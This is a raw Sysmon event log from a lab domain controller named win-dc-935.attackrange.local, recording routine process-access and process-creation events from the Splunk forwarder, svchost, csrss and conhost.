13:53:26.320{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002450Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:26.320{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002449Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:26.320{10ACEC4A-853E-5FCF-0500-000000009101}644660C:\Windows\system32\csrss.exe{10ACEC4A-8556-5FCF-6F00-000000009101}3956C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000002448Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:26.320{10ACEC4A-8551-5FCF-3300-000000009101}30803836C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{10ACEC4A-8556-5FCF-6F00-000000009101}3956C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+7d35e7|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+7cdcb9|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+7ca4ec|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+7ca0a3|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+7c9f0d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+6d7908|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+6de2ee|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+6b29fa|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+6b4274|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+e42dc|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ec682|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+e9959|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+d7f31|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000002447Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:26.323{10ACEC4A-8556-5FCF-6F00-000000009101}3956C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.ExeC:\Windows\system32\cmd.exe /c ""C:\Program Files\SplunkUniversalForwarder\etc\system\bin\WinPrintMon.cmd" --scheme"C:\Windows\system32\NT AUTHORITY\SYSTEM{10ACEC4A-853F-5FCF-E703-000000000000}0x3e70SystemMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{10ACEC4A-8551-5FCF-3300-000000009101}3080C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x80000000000000002446Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:26.211{10ACEC4A-8552-5FCF-4100-000000009101}28042768C:\Windows\system32\conhost.exe{10ACEC4A-8556-5FCF-6E00-000000009101}3820C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002445Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:26.211{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002444Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:26.211{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002443Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:26.211{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002442Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:26.211{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002441Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:26.211{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002440Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:26.211{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002439Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:26.211{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002438Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:26.211{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002437Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:26.211{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002436Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:26.211{10ACEC4A-853E-5FCF-0500-000000009101}6442448C:\Windows\system32\csrss.exe{10ACEC4A-8556-5FCF-6E00-000000009101}3820C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000002435Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:26.211{10ACEC4A-8551-5FCF-3300-000000009101}30803836C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{10ACEC4A-8556-5FCF-6E00-000000009101}3820C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+7d35e7|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+7cdcb9|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+7ca4ec|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+7ca0a3|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+7c9f0d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+6d7908|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+6de2ee|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+6b29fa|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+6b4274|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+e42dc|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ec682|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+e9959|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+d7f31|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000002434Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:26.213{10ACEC4A-8556-5FCF-6E00-000000009101}3820C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.ExeC:\Windows\system32\cmd.exe /c ""C:\Program Files\SplunkUniversalForwarder\etc\system\bin\WinNetMon.cmd" --scheme"C:\Windows\system32\NT AUTHORITY\SYSTEM{10ACEC4A-853F-5FCF-E703-000000000000}0x3e70SystemMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{10ACEC4A-8551-5FCF-3300-000000009101}3080C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x80000000000000002433Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:26.102{10ACEC4A-8552-5FCF-4100-000000009101}28042768C:\Windows\system32\conhost.exe{10ACEC4A-8556-5FCF-6D00-000000009101}2492C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002432Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:26.102{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002431Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:26.102{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002430Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:26.102{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002429Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:26.102{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002428Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:26.102{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002427Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:26.102{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002426Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:26.102{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002425Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 